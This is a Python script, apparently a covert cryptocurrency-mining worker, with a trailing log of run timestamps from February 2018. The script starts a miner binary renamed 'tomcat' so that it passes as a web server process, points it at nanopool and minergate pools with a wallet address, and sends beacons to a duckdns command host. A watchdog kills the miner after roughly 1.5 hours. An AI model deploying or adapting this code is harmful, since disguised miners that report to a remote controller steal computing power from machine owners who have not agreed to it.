import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:36:05.817241
#2018-02-17 17:24:05.211767
#2018-02-17 19:13:06.812945
#2018-02-17 21:01:01.416502
#2018-02-17 22:45:07.429760
#2018-02-18 00:31:03.585642
#2018-02-18 02:21:01.855096
#2018-02-18 04:08:07.047296
#2018-02-18 05:57:06.285850
#2018-02-18 07:48:06.959558
#2018-02-18 09:36:03.333511
#2018-02-18 11:21:07.655527
#2018-02-18 13:07:04.673611
#2018-02-18 14:54:01.776348
#2018-02-18 16:42:01.539137
#2018-02-18 18:30:09.670124
#2018-02-18 20:18:04.327616
#2018-02-18 22:03:05.833787
#2018-02-18 23:52:06.304273
#2018-02-19 01:38:07.470601
#2018-02-19 03:26:07.632381
#2018-02-19 05:11:05.243262
#2018-02-19 06:59:07.417785
#2018-02-19 08:48:01.931068
#2018-02-19 10:38:02.182443
#2018-02-19 12:24:07.105167
#2018-02-19 14:11:04.289340
#2018-02-19 16:01:01.306917
#2018-02-19 17:49:13.754951
#2018-02-19 19:36:02.100052
#2018-02-19 21:23:07.249920
#2018-02-19 23:09:06.946811
#2018-02-20 00:53:07.350851
#2018-02-20 02:42:07.814849
#2018-02-20 04:31:04.349918
#2018-02-20 06:15:09.246411
#2018-02-20 08:01:07.231043
#2018-02-20 09:46:07.192183
#2018-02-20 11:30:01.900203
#2018-02-20 13:17:08.961375
#2018-02-20 15:03:01.856614
#2018-02-20 16:47:16.599604
#2018-02-20 18:36:11.805806
#2018-02-20 20:26:06.562286
#2018-02-20 22:11:06.095373
#2018-02-20 23:51:05.216948
#2018-02-21 01:36:01.518210
#2018-02-21 03:23:05.404978
#2018-02-21 05:11:06.915178
#2018-02-21 06:59:04.935584
#2018-02-21 08:45:09.590592
#2018-02-21 10:31:04.682584
#2018-02-21 12:19:08.845918
#2018-02-21 14:06:06.331264
#2018-02-21 15:51:01.681255
#2018-02-21 17:42:08.495761
#2018-02-21 19:28:05.539348
#2018-02-21 21:16:04.738808
#2018-02-21 23:04:01.455859
#2018-02-22 00:51:08.013171
#2018-02-22 02:40:04.408697
#2018-02-22 04:28:05.206981
#2018-02-22 06:14:01.241773
#2018-02-22 07:58:07.848327
#2018-02-22 09:47:05.165541
#2018-02-22 11:32:04.859751
#2018-02-22 13:19:06.948693
#2018-02-22 15:08:06.032684
#2018-02-22 16:51:05.088035
#2018-02-22 18:38:07.483978
#2018-02-22 20:29:05.708097
#2018-02-22 22:15:08.111767
#2018-02-23 00:01:04.405044
#2018-02-23 01:48:05.676874
#2018-02-23 03:36:01.691832
#2018-02-23 05:20:05.855436
#2018-02-23 07:05:01.565810
#2018-02-23 08:53:01.786082
#2018-02-23 11:11:08.970749
#2018-02-23 13:06:08.975051
#2018-02-23 14:51:01.465602
#2018-02-23 16:39:10.315351
#2018-02-23 18:27:04.735336
#2018-02-23 20:13:05.966619
#2018-02-23 22:02:01.580280
#2018-02-23 23:49:08.160840
#2018-02-24 01:40:09.938075
#2018-02-24 03:29:01.598621
#2018-02-24 05:15:01.551694
#2018-02-24 07:03:04.562436
#2018-02-24 08:37:03.965703
#2018-02-24 10:08:01.495155
#2018-02-24 11:52:03.937703
#2018-02-24 13:19:04.647143
#2018-02-24 14:52:06.318221
#2018-02-24 16:26:03.780099
#2018-02-24 18:02:06.291468
#2018-02-24 19:31:05.151216
#2018-02-24 21:07:07.055908
#2018-02-24 23:11:02.054616
#2018-02-25 03:23:05.682572
#2018-02-25 06:54:05.769021